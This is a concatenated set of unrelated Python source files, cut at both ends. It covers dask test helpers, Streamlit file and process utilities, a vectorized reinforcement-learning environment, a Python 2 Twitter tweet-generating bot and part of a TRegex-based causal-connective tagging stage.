>>> read_queue = asyncio.Queue()
>>> w.rpc = _LockedCommPool(
w.rpc,
read_event=read_event,
read_queue=read_queue,
)
# It might be necessary to remove all existing comms
# if the wrapped pool has been used before
>>> w.remove(remote_address)
>>> async def ping_pong():
return await w.rpc(remote_address).ping()
>>> with pytest.raises(asyncio.TimeoutError):
>>> await asyncio.wait_for(ping_pong(), 0.01)
>>> read_event.set()
>>> await ping_pong()
"""
def __init__(
self, pool, read_event=None, read_queue=None, write_event=None, write_queue=None
):
self.write_event = write_event
self.write_queue = write_queue
self.read_event = read_event
self.read_queue = read_queue
self.pool = pool
def __getattr__(self, name):
return getattr(self.pool, name)
async def connect(self, *args, **kwargs):
comm = await self.pool.connect(*args, **kwargs)
return LockedComm(
comm, self.read_event, self.read_queue, self.write_event, self.write_queue
)
async def close(self):
await self.pool.close()
def xfail_ssl_issue5601():
"""Work around https://github.com/dask/distributed/issues/5601 where any test that
inits Security.temporary() crashes on MacOS GitHub Actions CI
"""
pytest.importorskip("cryptography")
try:
Security.temporary()
except ImportError:
if MACOS:
pytest.xfail(reason="distributed#5601")
raise
def assert_worker_story(
story: list[tuple], expect: list[tuple], *, strict: bool = False
) -> None:
"""Test the output of ``Worker.story``
Parameters
==========
story: list[tuple]
Output of Worker.story
expect: list[tuple]
        Expected events. Each expected event must contain exactly two fewer fields
        than the story events (the last two fields are always the stimulus_id and
        the timestamp).
Elements of the expect tuples can be
- callables, which accept a single element of the event tuple as argument and
return True for match and False for no match;
- arbitrary objects, which are compared with a == b
e.g.
.. code-block:: python
expect=[
("x", "missing", "fetch", "fetch", {}),
("gather-dependencies", worker_addr, lambda set_: "x" in set_),
]
strict: bool, optional
If True, the story must contain exactly as many events as expect.
If False (the default), the story may contain more events than expect; extra
events are ignored.
"""
now = time()
prev_ts = 0.0
for ev in story:
try:
assert len(ev) > 2
assert isinstance(ev, tuple)
assert isinstance(ev[-2], str) and ev[-2] # stimulus_id
assert isinstance(ev[-1], float) # timestamp
assert prev_ts <= ev[-1] # Timestamps are monotonic ascending
# Timestamps are within the last hour. It's been observed that a timestamp
# generated in a Nanny process can be a few milliseconds in the future.
assert now - 3600 < ev[-1] <= now + 1
prev_ts = ev[-1]
except AssertionError:
raise AssertionError(
f"Malformed story event: {ev}\nin story:\n{_format_story(story)}"
)
try:
if strict and len(story) != len(expect):
raise StopIteration()
story_it = iter(story)
for ev_expect in expect:
while True:
event = next(story_it)
# Ignore (stimulus_id, timestamp)
event = event[:-2]
if len(event) == len(ev_expect) and all(
ex(ev) if callable(ex) else ev == ex
for ev, ex in zip(event, ev_expect)
):
break
except StopIteration:
raise AssertionError(
f"assert_worker_story({strict=}) failed\n"
f"story:\n{_format_story(story)}\n"
f"expect:\n{_format_story(expect)}"
) from None
def _format_story(story: list[tuple]) -> str:
if not story:
return "(empty story)"
return "- " + "\n- ".join(str(ev) for ev in story)
class BrokenComm(Comm):
peer_address = ""
local_address = ""
def close(self):
pass
def closed(self):
return True
def abort(self):
pass
def read(self, deserializers=None):
raise OSError()
def write(self, msg, serializers=None, on_error=None):
raise OSError()
def has_pytestmark(test_func: Callable, name: str) -> bool:
"""Return True if the test function is marked by the given @pytest.mark.<name>;
False otherwise.
FIXME doesn't work with individually marked parameters inside
@pytest.mark.parametrize
"""
marks = getattr(test_func, "pytestmark", [])
return any(mark.name == name for mark in marks)
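# Hedged usage sketch for ``has_pytestmark`` (the test function is hypothetical):
#
#     @pytest.mark.slow
#     def test_example():
#         pass
#
#     assert has_pytestmark(test_example, "slow")
#     assert not has_pytestmark(test_example, "gpu")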
|
utils.py
|
import os
import datetime
from multiprocessing import Process
import time
import yaml
import streamlit as st
import psutil
import pandas as pd
from typing import Callable, Union, Tuple
def get_size(path: str) -> float:
"""
Helper function to get size of a path (file / folder)
Args:
path (str): Path to the folder / file.
Returns:
float: Total size in bytes.
"""
if path.endswith(".d"):
size_function = get_folder_size
else:
size_function = os.path.getsize
return size_function(path)
def get_folder_size(start_path: str) -> float:
"""Returns the total size of a given folder.
Args:
start_path (str): Path to the folder that should be checked.
Returns:
float: Total size in bytes.
"""
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
# skip if it is symbolic link
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
return total_size
def escape_markdown(text: str) -> str:
"""Helper function to escape markdown in text.
Args:
text (str): Input text.
Returns:
str: Converted text to be used in markdown.
"""
MD_SPECIAL_CHARS = "\`*_{}[]()#+-.!"
for char in MD_SPECIAL_CHARS:
text = text.replace(char, "\\" + char)
return text
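# Hedged example: escape_markdown("a_b*c") returns "a\\_b\\*c" as a Python literal,
# i.e. the underscore and asterisk are backslash-escaped so the text renders
# literally when passed to st.markdown.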
def markdown_link(description: str, link: str):
"""Creates a markdown compatible link.
Args:
description (str): Description.
link (str): Target URL.
"""
_ = f"[{description}]({link})"
st.markdown(_, unsafe_allow_html=True)
def files_in_folder(folder: str, ending: str, sort: str = "name") -> list:
"""Reads a folder and returns all files that have this ending. Sorts the files by name or creation date.
Args:
folder (str): Path to folder.
ending (str): Ending.
sort (str, optional): How files should be sorted. Defaults to 'name'.
Raises:
NotImplementedError: If a sorting mode is called that is not implemented.
Returns:
list: List of files.
"""
files = [_ for _ in os.listdir(folder) if _.endswith(ending)]
if sort == "name":
files.sort()
elif sort == "date":
files.sort(key=lambda x: os.path.getctime(os.path.join(folder, x)))
else:
raise NotImplementedError
files = files[::-1]
return files
def files_in_folder_pandas(folder: str) -> pd.DataFrame:
"""Reads a folder and returns a pandas dataframe containing the files and additional information.
Args:
folder (str): Path to folder.
Returns:
        pd.DataFrame: DataFrame with one row per file (name, creation date, size).
"""
files = os.listdir(folder)
created = [time.ctime(os.path.getctime(os.path.join(folder, _))) for _ in files]
sizes = [get_size(os.path.join(folder, _)) / 1024 ** 2 for _ in files]
df = pd.DataFrame(files, columns=["File"])
df["Created"] = created
df["Filesize (Mb)"] = sizes
return df
def read_log(log_path: str):
"""Reads logfile and removes lines with __.
Lines with __ are used to indicate progress for the AlphaPept GUI.
Args:
        log_path (str): Path to the logfile.
"""
if os.path.isfile(log_path):
with st.expander("Run log"):
with st.spinner("Parsing file"):
with open(log_path, "r") as logfile:
lines = logfile.readlines()
lines = [_ for _ in lines if "__" not in _]
st.code("".join(lines))
def start_process(
target: Callable,
process_file: str,
args: Union[list, None] = None,
verbose: bool = True,
):
"""Function to initiate a process. It will launch the process and save the process id to a yaml file.
Args:
target (Callable): Target function for the process.
process_file (str): Path to the yaml file where the process information will be stored.
args (Union[list, None], optional): Additional arguments for the process. Defaults to None.
        verbose (bool, optional): Flag to show a streamlit message. Defaults to True.
"""
process = {}
now = datetime.datetime.now()
process["created"] = now
if args:
p = Process(target=target, args=args)
else:
p = Process(target=target)
p.start()
process["pid"] = p.pid
if verbose:
st.success(f"Started process PID {p.pid} at {now}")
with open(process_file, "w") as file:
yaml.dump(process, file, sort_keys=False)
def check_process(
process_path: str,
) -> Tuple[bool, Union[str, None], Union[str, None], Union[str, None], bool]:
"""Function to check the status of a process.
Reads the process file from the yaml and checks the process id.
Args:
process_path (str): Path to the process file.
Returns:
        bool: Flag if the process exists.
        Union[str, None]: Process id if the process exists, else None.
        Union[str, None]: Process name if the process exists, else None.
        Union[str, None]: Process status if the process exists, else None.
        bool: Flag if the process was initialized.
"""
if os.path.isfile(process_path):
with open(process_path, "r") as process_file:
process = yaml.load(process_file, Loader=yaml.FullLoader)
if process:
last_pid = process["pid"]
if "init" in process:
p_init = process["init"]
else:
p_init = False
if psutil.pid_exists(last_pid):
p_ = psutil.Process(last_pid)
with p_.oneshot():
p_name = p_.name()
status = p_.status()
return True, last_pid, p_name, status, p_init
return False, None, None, None, False
def init_process(process_path: str, **kwargs: dict):
"""Waits until a process file is created and then writes an init flag to the file
Args:
process_path (str): Path to process yaml.
"""
while True:
if os.path.isfile(process_path):
with open(process_path, "r") as process_file:
process = yaml.load(process_file, Loader=yaml.FullLoader)
process["init"] = True
for _ in kwargs:
process[_] = kwargs[_]
with open(process_path, "w") as file:
yaml.dump(process, file, sort_keys=False)
break
else:
time.sleep(1)
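# Hedged sketch of how these helpers are meant to work together (the target
# function and the yaml path below are hypothetical):
#
#     PROCESS_FILE = "process.yaml"
#
#     def long_task():
#         init_process(PROCESS_FILE)   # mark the spawned process as initialized
#         ...                          # actual work
#
#     start_process(long_task, PROCESS_FILE)
#     running, pid, name, status, initialized = check_process(PROCESS_FILE)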
def check_file(path: str) -> bool:
"""Function to check if a file exists.
    This function will also return False if the path is None.
Args:
path (str): Path to the file to be checked.
Returns:
        bool: Flag if the file exists.
"""
if path:
if os.path.isfile(path):
return True
else:
return False
else:
return False
def compare_date(date: str, minimum_date: datetime.datetime) -> bool:
    """Utility function to convert the acquisition date time to a datetime format.
    Checks whether it was acquired after the minimum_date.
    Args:
        date (str): Datetime as string.
        minimum_date (datetime.datetime): Date to compare against.
    Returns:
        bool: Flag if the file was acquired after the minimum date.
"""
if not date:
return False
if date.endswith('Z'):
rem = date.split('.')[1]
if len(rem) == 8:
date = date[:-2]+'Z'
dt = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ')
else:
dt = datetime.datetime.fromisoformat(date).replace(tzinfo=None)
if dt > minimum_date:
return True
else:
return False
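# Hedged examples (the dates are made up); compare_date returns True only when
# the acquisition date lies after the given minimum date:
#
#     compare_date("2021-06-01T12:00:00.123456", datetime.datetime(2021, 1, 1))  # True
#     compare_date("2020-06-01T12:00:00.123456", datetime.datetime(2021, 1, 1))  # False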
|
vec_env.py
|
import argparse
import cloudpickle
from multiprocessing import Process, Pipe
import numpy as np
from .base import BaseEnv
class RunningNormalizer(object):
def __init__(self, shape):
self.shape = shape
self.running_mean = np.zeros(shape)
self.running_var, self.running_std = np.ones(shape), np.ones(shape)
self.count = 1e-8
def update(self, obs):
if len(obs.shape) == len(self.shape):
obs = np.expand_dims(obs, 0)
batch_mean, batch_var = obs.mean(0), obs.var(0)
batch_size = obs.shape[0]
self._update_batch(batch_mean, batch_var, batch_size)
def _update_batch(self, batch_mean, batch_var, batch_size):
new_count = self.count + batch_size
delta_mean = batch_mean - self.running_mean
self.running_mean += delta_mean * batch_size / new_count
square_sum = self.running_var * self.count + batch_var * batch_size + (delta_mean ** 2) * self.count * batch_size / new_count
self.running_var = square_sum / new_count
self.running_std = np.sqrt(self.running_var + 1e-8)
self.count = new_count
def normalize(self, obs):
return (obs - self.running_mean) / self.running_std
def denormalize(self, obs):
return self.running_mean + obs * self.running_std
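# Hedged usage sketch for RunningNormalizer (shapes and data are illustrative):
#
#     normalizer = RunningNormalizer(shape=(3,))
#     batch = np.random.randn(32, 3)
#     normalizer.update(batch)                  # fold a batch into the running stats
#     normed = normalizer.normalize(batch)      # roughly zero-mean, unit-variance
#     restored = normalizer.denormalize(normed) # inverse transform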
class CloudpickleWrapper(object):
"""Couldpickle allows more general object serialization
"""
def __init__(self, a):
self.a = a
def __getstate__(self):
        return cloudpickle.dumps(self.a)
def __setstate__(self, a):
self.a = cloudpickle.loads(a)
def _worker(remote, parent_remote, env_fn_wrapper):
"""Subprocessed workers of the environment
"""
parent_remote.close()
env = env_fn_wrapper.a()
while True:
try:
cmd, data = remote.recv()
if cmd == "reset":
obs = env.reset()
remote.send(obs)
elif cmd == "step":
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
remote.send((obs, reward, done, info))
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "train":
env.train()
elif cmd == "eval":
env.eval()
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_base_info":
remote.send((env.continuous_action_space, env.n_obs, env.n_act))
else:
raise NotImplementedError
except EOFError:
break
class VecEnv(BaseEnv):
"""The vectorized environment contains the observation/reward normalization part
"""
def __init__(self):
super(VecEnv, self).__init__()
parser = argparse.ArgumentParser()
parser.add_argument("--scenario", default="control", choices=["control", "atari", "mujoco"])
parser.add_argument("--gamma", default=0.99, type=float)
args = parser.parse_known_args()[0]
self.gamma = args.gamma
self.normalize_obs = args.scenario in ["control", "mujoco"]
self.normalize_reward = args.scenario in ["control", "atari", "mujoco"]
def init_normalizer(self):
self.obs_normalizer = RunningNormalizer(self.n_obs) if self.normalize_obs else None
self.ret = np.zeros(self.num_env)
self.ret_normalizer = RunningNormalizer((self.num_env, )) if self.normalize_reward else None
def process_obs(self, obs):
if self.obs_normalizer:
self.obs_normalizer.update(obs)
obs = self.obs_normalizer.normalize(obs)
return obs
def process_reward(self, reward, done):
self.ret = reward + self.gamma * self.ret
if self.normalize_reward:
self.ret_normalizer.update(self.ret)
reward /= self.ret_normalizer.running_std
self.ret[done] = 0
return reward
@property
def reward_scale_factor(self):
return self.ret_normalizer.running_std if self.normalize_reward else 1
class DummyVecEnv(VecEnv):
"""The vectorized environment should inherit all necessary methods and properties of the normal base environment
For DummyVecEnv, the environments are actually parallelized virtually in a serialized way in one process
"""
def __init__(self, env_fns):
super(DummyVecEnv, self).__init__()
self.num_env = len(env_fns)
self.envs = [env_fn() for env_fn in env_fns]
self.continuous_action_space = self.envs[0].continuous_action_space
self.n_obs, self.n_act = self.envs[0].n_obs, self.envs[0].n_act
self.init_normalizer()
def reset(self):
obs = np.stack([env.reset() for env in self.envs])
self.ret = np.zeros(self.num_env)
return self.process_obs(obs)
def step(self, actions):
results = [env.step(actions[k]) for k, env in enumerate(self.envs)]
old_obs, reward, done, info = zip(*results)
        new_obs = [env.reset() if d else o for o, d, env in zip(old_obs, done, self.envs)]
obs, reward, done = np.stack(new_obs), np.stack(reward), np.stack(done)
obs, reward = self.process_obs(obs), self.process_reward(reward, done)
return obs, reward, done, {"vec_info": info}
def train(self):
self.training = True
for env in self.envs:
env.train()
def eval(self):
self.training = False
for env in self.envs:
env.eval()
def render(self):
raise NotImplementedError
def close(self):
for env in self.envs:
env.close()
class SubprocVecEnv(VecEnv):
"""The vectorized environment should inherit all necessary methods and properties of the normal base environment
We activate a subprocess for each single environment and communicate with them as remote workers, and we always run them asynchronously but the environments should be aligned by time step
"""
def __init__(self, env_fns):
super(SubprocVecEnv, self).__init__()
self.waiting = False
self.closed = False
self.num_env = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(self.num_env)])
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)), daemon=True)
for remote, work_remote, env_fn in zip(self.remotes, self.work_remotes, env_fns)
]
for p in self.ps:
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(("get_base_info", None))
self.continuous_action_space, self.n_obs, self.n_act = self.remotes[0].recv()
self.init_normalizer()
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
obs = np.stack([remote.recv() for remote in self.remotes])
self.ret = np.zeros(self.num_env)
return self.process_obs(obs)
def step_async(self, actions):
self.waiting = True
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, reward, done, info = zip(*results)
obs, reward, done = np.stack(obs), np.stack(reward), np.stack(done)
obs, reward = self.process_obs(obs), self.process_reward(reward, done)
return obs, reward, done, {"vec_info": info}
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def train(self):
self.training = True
for remote in self.remotes:
remote.send(("train", None))
def eval(self):
self.training = False
for remote in self.remotes:
remote.send(("eval", None))
def render(self):
raise NotImplementedError
def close(self):
if self.closed: return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for p in self.ps:
p.join()
self.closed = True
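# Hedged construction sketch (MyEnv is a hypothetical BaseEnv subclass and
# `actions` holds one action per sub-environment):
#
#     env_fns = [lambda: MyEnv() for _ in range(4)]
#     vec_env = SubprocVecEnv(env_fns)   # or DummyVecEnv(env_fns) for a single process
#     obs = vec_env.reset()
#     obs, reward, done, info = vec_env.step(actions)
#     vec_env.close()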
|
generate_tweets.py
|
#!/usr/bin/env python
"""Generate tweets based on what comes in along in the tweet stream."""
import sys
import os
import tweepy
import common
import time
import multiprocessing
import signal
import random
try:
import credentials
except ImportError:
raise StandardError("Please copy credentials_template.py to credentials.py and fill in the missing elements.")
from collections import Counter, defaultdict
TWEET_INTERVAL = 3600 * 3
SAMPLE_SIZE = 3
QUESTION_WORDS = {'where', 'what', 'who', 'how', 'why'}
SECOND_WORDS = {'is', 'was', 'were', 'should', 'do', 'does'}
REFLECT = {'you': 'I',
'yours': 'mine',
'your': 'my',
'i': 'you',
'mine': 'yours',
'my': 'your'}
CONNETIONS = {'where': 'in',
'why': 'because'}
def get_next_token(api, key, hash_tag_counter, length_so_far):
sample_counters = defaultdict(common.SampleCounter)
max_count = 0
max_key = None
tweet_count = 0
seen = set()
for tweet in tweepy.Cursor(api.search,
q='"%s" -filter:retweets' % (' '.join(key)),
rpp=100,
result_type="recent",
include_entities=True).items():
tokens = common.tokenize_tweet(tweet.text)
filtered = ''.join((tk for idx, tk in enumerate(tokens) if idx % 2 == 1))
if filtered in seen:
continue
tweet_count += 1
seen.add(filtered)
for token in tokens:
if token.startswith('#'):
hash_tag_counter[token] += 1
for idx in range(1, len(tokens) - len(key) * 2, 2):
for offset, token in enumerate(key):
if tokens[idx + offset * 2].lower() != token.lower():
break
else:
next_token = tokens[idx + offset * 2 + 2]
sample = tokens[idx + offset * 2 + 1]
sample_weight = 1
if idx + offset * 2 + 4 == len(tokens):
sample += 'X'
if length_so_far < 50:
sample_weight = 0.5
elif length_so_far > 70:
sample_weight = float(length_so_far) / 50
sample_counters[next_token].count += 1
sample_counters[next_token].sample[sample] += sample_weight
if sample_counters[next_token].count > max_count:
max_key = next_token
max_count = sample_counters[next_token].count
print 'best', max_key, max_count
if max_count >= SAMPLE_SIZE:
break
if max_count >= SAMPLE_SIZE:
break
if tweet_count % 25 == 0:
time.sleep(1)
if tweet_count > 150:
return True, '', ''
if max_key is None:
# Dead end
return True, '', ''
sample = sample_counters[max_key].sample.most_common(1)[0][0]
done = sample.endswith('X')
if done:
sample = sample[:-1]
return done, max_key, sample
def generate_new_tweet(auth, tokens):
key = tuple(x.lower() for idx, x in enumerate(tokens) if idx % 2 == 1)
tweet = ''.join(tokens)
tweepy_api = tweepy.API(auth)
hash_tag_counter = Counter()
done = False
first = True
while not done and len(tweet) < 140:
done, token, text = get_next_token(tweepy_api, key, hash_tag_counter, len(tweet))
if first and done and len(key) > 2:
key = key[1:]
done = False
continue
first = False
key += (token,)
while len(key) > 4:
key = key[1:]
tweet += text + token
print key, tweet
while len(tweet) > 140 and '.' in tweet:
tweet = tweet[:tweet.rfind('.')].strip()
if len(tweet) > 140:
return None
if not '#' in tweet:
for ht, cnt in hash_tag_counter.most_common():
if cnt <= 1:
print ht, cnt
break
if len(tweet) + len(ht) < 139:
print ht, cnt
tweet += ' ' + ht
break
return tweet
def reply_to(auth, text):
tokens = [REFLECT.get(t.lower(), t) for idx, t in enumerate(common.tokenize_tweet(text)) if idx % 2 == 1]
if tokens[0][0] == '@':
del tokens[0]
if len(tokens) < 4 or not tokens[0].lower() in QUESTION_WORDS or not (tokens[1].lower() in SECOND_WORDS or tokens[2].lower() in SECOND_WORDS):
reply = "I only understand simple questions. Yours I did not recognize: %s" % text
return reply[:120]
if not tokens[1].lower() in SECOND_WORDS:
del tokens[1]
if tokens[1].lower() in ('do', 'does'):
text = ' '.join(tokens[2:])
else:
text = ' '.join(tokens[2:]) + ' ' + tokens[1]
if tokens[0] in CONNETIONS:
text += ' ' + CONNETIONS[tokens[0]]
tokens = common.tokenize_tweet(text)
return generate_new_tweet(auth, tokens)
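# Rough sketch of the rewrite performed above (assuming common.tokenize_tweet
# yields the words at the odd indices): a question like "where is the party"
# becomes the seed phrase "the party is" plus the connective "in", which
# generate_new_tweet then extends by searching Twitter for continuations.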
def post_tweets(queue):
starts = file(os.path.expanduser(common.TWEET_START_PATH)).read().splitlines()
auth = tweepy.OAuthHandler(credentials.CONSUMER_KEY, credentials.CONSUMER_SECRET)
auth.set_access_token(credentials.ACCESS_KEY, credentials.ACCESS_SECRET)
tweepy_api = tweepy.API(auth)
last_post = 0
while True:
if not queue.empty():
tweet = queue.get(block=False)
if tweet:
                print 'got tweet from %s: %s' % (tweet.user.screen_name, tweet.text)
new_tweet = reply_to(auth, tweet.text)
if not new_tweet:
new_tweet = "I could not find that."
tweepy_api.update_status(status='@%s: %s' % (tweet.user.screen_name, new_tweet), in_reply_to_status_id=tweet.id)
if time.time() - last_post > TWEET_INTERVAL:
a_start = random.choice(starts)
print 'starting from:', a_start
tokens = common.tokenize_tweet(a_start)
new_tweet = generate_new_tweet(auth, tokens)
if new_tweet:
tweepy_api.update_status(status=new_tweet)
last_post = time.time()
time.sleep(1)
class UserListener(tweepy.StreamListener):
def __init__(self, queue, screen_name):
super(UserListener, self).__init__()
self._queue = queue
self._screen_name = screen_name
def on_status(self, status):
text = status.text
print text
if text.startswith('@' + self._screen_name):
self._queue.put(status)
def on_error(self, status_code):
print >> sys.stderr, 'Encountered error with status code:', status_code
return True
def on_timeout(self):
print >> sys.stderr, 'Timeout...'
return True
def on_connect(self):
print 'Connected.'
return True
def watch_user(queue):
auth = tweepy.OAuthHandler(credentials.CONSUMER_KEY, credentials.CONSUMER_SECRET)
auth.set_access_token(credentials.ACCESS_KEY, credentials.ACCESS_SECRET)
tweepy_api = tweepy.API(auth)
me = tweepy_api.me()
listener = UserListener(queue, me.screen_name)
sapi = tweepy.streaming.Stream(auth, listener)
sapi.filter(follow=[me.id])
if __name__ == '__main__':
reply_queue = multiprocessing.Queue()
watch_user_process = multiprocessing.Process(target=watch_user, args=(reply_queue,))
post_tweets_process = multiprocessing.Process(target=post_tweets, args=(reply_queue,))
watch_user_process.start()
post_tweets_process.start()
def signal_handler(signal, frame):
print 'Exiting'
watch_user_process.terminate()
post_tweets_process.terminate()
signal.signal(signal.SIGINT, signal_handler)
print 'Press Ctrl+C to abort'
signal.pause()
|
tregex_stage.py
|
from gflags import (DEFINE_string, FLAGS, DuplicateFlagError, DEFINE_integer,
DEFINE_enum)
import itertools
import threading
import logging
from math import log10
from os import path
import Queue
import subprocess
import sys
import tempfile
import time
from threading import Lock
from nlpypline.data import Token
from nlpypline.pipeline import Stage
from nlpypline.pipeline.models import Model
from causeway import (PossibleCausation, PairwiseAndNonIAAEvaluator,
get_causation_tuple)
from nlpypline.util import pairwise, igroup, hash_file
from nlpypline.util.nltk import subtree_at_index, index_of_subtree
from nlpypline.util.scipy import steiner_tree, longest_path_in_tree
import os
try:
DEFINE_string('tregex_dir',
'/home/jesse/Documents/Work/Research/'
'stanford-corenlp-full-2015-04-20',
'Command to run TRegex')
DEFINE_integer(
'tregex_max_steiners', 6,
'Maximum number of Steiner nodes to be allowed in TRegex patterns')
DEFINE_integer('tregex_max_threads', 30,
'Max number of TRegex processor threads')
DEFINE_integer('tregex_max_cache_filename_len', 255,
'Max filename length to allow for files in the TRegex cache')
DEFINE_enum('tregex_pattern_type', 'dependency',
['dependency', 'constituency'],
'Type of tree to generate and run TRegex patterns with')
except DuplicateFlagError as e:
logging.warn('Ignoring flag redefinitions; assuming module reload')
class TRegexConnectiveModel(Model):
def __init__(self, *args, **kwargs):
super(TRegexConnectiveModel, self).__init__(*args, **kwargs)
self.tregex_patterns = []
# Internal hackery properties, used for training.
self._ptb_strings = None
self._num_sentences = None # Poor man's check for same sentences
def reset(self):
self.tregex_patterns = []
def _train_model(self, sentences):
ptb_strings = self._extract_patterns(sentences)
# Dirty hack to avoid redoing all the preprocessing when test() is
# called to provide input to the next stage.
self._ptb_strings = ptb_strings
self._num_sentences = len(sentences)
def test(self, sentences):
logging.info('Tagging possible connectives...')
start_time = time.time()
if (self._ptb_strings is not None
and self._num_sentences == len(sentences)):
ptb_strings = self._ptb_strings
self._ptb_strings = None
else:
ptb_strings = self._preprocess_sentences(sentences)
# Interacting with the TRegex processes is heavily I/O-bound, plus we
# really want multiple TRegex processes running in parallel, so we farm
# out patterns to worker threads.
# Queue up the patterns
total_estimated_bytes = 0
queue = Queue.Queue()
for (pattern, connective_labels, connective_lemmas
) in self.tregex_patterns:
possible_sentence_indices = self._filter_sentences_for_pattern(
sentences, pattern, connective_lemmas)
queue.put_nowait((pattern, connective_labels,
possible_sentence_indices, connective_lemmas))
# Estimate total output file size for this pattern: each
# sentence has sentence #, + 3 bytes for : and newlines.
# As a very rough estimate, matching node names increase the
# bytes used by ~1.85x.
total_estimated_bytes += sum(
1.85 * (int(log10(i + 1)) + 3)
for i in range(len(possible_sentence_indices)))
predicted_outputs = [[] for _ in range(len(sentences))]
logging.info("%d patterns in queue", queue.qsize())
# Start the threads
threads = []
for _ in range(FLAGS.tregex_max_threads):
new_thread = self.TregexProcessorThread(
sentences, ptb_strings, queue, predicted_outputs)
threads.append(new_thread)
new_thread.start()
# Set up progress reporter and wait for threads to finish.
all_threads_done = [False] # use a list for passing by ref (EVIL HACK)
progress_reporter = self._make_progress_reporter(
threads, total_estimated_bytes, all_threads_done)
try:
progress_reporter.start()
queue.join()
finally:
# Make sure progress reporter exits
all_threads_done[0] = True
elapsed_seconds = time.time() - start_time
logging.info("Done tagging possible connectives in %0.2f seconds"
% elapsed_seconds)
# predicted_outputs has now been modified by the threads.
return predicted_outputs
#####################################
# Sentence preprocessing
#####################################
@staticmethod
def _preprocess_sentences(sentences):
logging.info("Preprocessing sentences...")
ptb_strings = []
for sentence in sentences:
sentence.possible_causations = []
if FLAGS.tregex_pattern_type == 'dependency':
ptb_strings.append(sentence.dep_to_ptb_tree_string() + '\n')
else:
ptb_strings.append(sentence.constituency_tree.pformat() + '\n')
if FLAGS.tregex_pattern_type == 'dependency':
# TODO: is it a problem that the acl passives also occasionally
# catch "by means of" expressions (e.g., "killed by strangulation")?
# TODO: Write a TSurgeon sequence to normalize verbal modifier
# passives with clausal causes? (e.g., "cancer, caused by smoking
# too much,..."). Requires handling acl -> advcl -> mark(by) rather
# than acl -> nmod -> case(by). Problematic because usually seems to
# occur in "by means of" cases.
# TODO: Edit to not transform "by means" or "by reason"?
# Order matters a lot here.
tsurgeon_script_names = [
'normalize_passives',
'normalize_acl_passives_1',
'normalize_acl_passives_2',
'normalize_acl_no_agent_1',
'normalize_acl_no_agent_2',
'normalize_acl_no_agent_3']
module_dir = path.dirname(path.realpath(__file__))
tsurgeon_script_names = [
path.join(module_dir, 'tsurgeon_dep', script_name) + '.ts'
for script_name in tsurgeon_script_names]
with tempfile.NamedTemporaryFile('w', prefix='trees',
delete=False) as tree_file:
encoded_strings = [s.encode('utf-8') for s in ptb_strings]
tree_file.writelines(encoded_strings)
tree_file.flush()
with tempfile.NamedTemporaryFile(
'w+b', prefix='tsurgeon', delete=False) as surgeried_file:
tsurgeon_command = (
([path.join(FLAGS.tregex_dir, 'tsurgeon.sh'), '-s',
'-treeFile', tree_file.name]
+ tsurgeon_script_names))
devnull = ( # To debug errors, change to stderr
TRegexConnectiveModel.TregexProcessorThread.dev_null)
retval = subprocess.call(
tsurgeon_command, stdout=surgeried_file, stderr=devnull)
if retval != 0:
raise RuntimeError("TSurgeon command failed: %s"
% tsurgeon_command)
surgeried_file.seek(0)
ptb_strings = surgeried_file.readlines()
else:
# Temporary measure until we get TSurgeon scripts updated for
# constituency parses: don't do any real preprocessing.
# TODO: Implement constituency scripts, and move TSurgeon-running
# code to be shared.
pass
logging.info('Done preprocessing.')
return ptb_strings
@staticmethod
def _filter_sentences_for_pattern(sentences, pattern, connective_lemmas):
possible_sentence_indices = []
for i, sentence in enumerate(sentences):
token_lemmas = [token.lemma for token in sentence.tokens]
# TODO: Should we filter here by whether there are enough tokens in
# the sentence to match the rest of the pattern, too?
if all([connective_lemma in token_lemmas
for connective_lemma in connective_lemmas]):
possible_sentence_indices.append(i)
return possible_sentence_indices
#####################################
# Pattern generation
#####################################
@staticmethod
def _get_dep_node_pattern(
sentence, node_index, node_names, connective_indices,
steiner_nodes, cause_head, effect_head):
def non_connective_pattern(node_name):
node_names[node_index] = node_name
return '/.*_[0-9]+/=%s' % node_name
'''
parent_sentence = token.parent_sentence
if parent_sentence.is_clause_head(token):
pos_pattern = '[<2 /^VB.*/ | < (__ <1 cop)]'
else:
pos_pattern = ('<2 /^%s.*/' % token.get_gen_pos())
return '/.*_[0-9+]/=%s %s' % (node_name, pos_pattern)
'''
token = sentence.tokens[node_index]
try:
connective_index = connective_indices.index(node_index)
node_name = 'connective_%d' % connective_index
node_names[node_index] = node_name
return ('/^%s_[0-9]+$/=%s <2 /^%s.*/' % (
token.lemma, node_name, token.get_gen_pos()))
except ValueError: # It's not a connective node
try:
steiner_index = steiner_nodes.index(node_index)
return non_connective_pattern('steiner_%d' % steiner_index)
except ValueError: # It's an argument node_index
node_name = ['cause', 'effect'][
token.index == effect_head.index]
return non_connective_pattern(node_name)
@staticmethod
def _get_dep_edge_pattern(edge_start, edge_end, sentence):
edge_label = sentence.edge_labels[(edge_start, edge_end)]
if edge_label in ['nsubj', 'csubj']:
options = ['<1 nsubj', '<1 csubj']
elif edge_label in ['nsubjpass', 'csubjpass']:
options = ['<1 nsubjpass', '<1 csubjpass']
else:
options = ['<1 ' + edge_label]
if edge_label != 'dep':
options.append('<1 dep')
return '[%s]' % ' | '.join(options)
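    # Illustrative example derived from the options above: for an edge labeled
    # 'nsubj' this yields the TRegex relation pattern '[<1 nsubj | <1 csubj | <1 dep]'.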
@staticmethod
def _add_dep_edge_to_pattern(sentence, steiner_graph, pattern,
node_pattern, edge_start, edge_end,
node_names):
forward_weight = steiner_graph[edge_start, edge_end]
back_weight = steiner_graph[edge_end, edge_start]
independent_pattern = ''
if forward_weight > back_weight: # forward edge dominates
edge_pattern = TRegexConnectiveModel._get_dep_edge_pattern(
edge_start, edge_end, sentence)
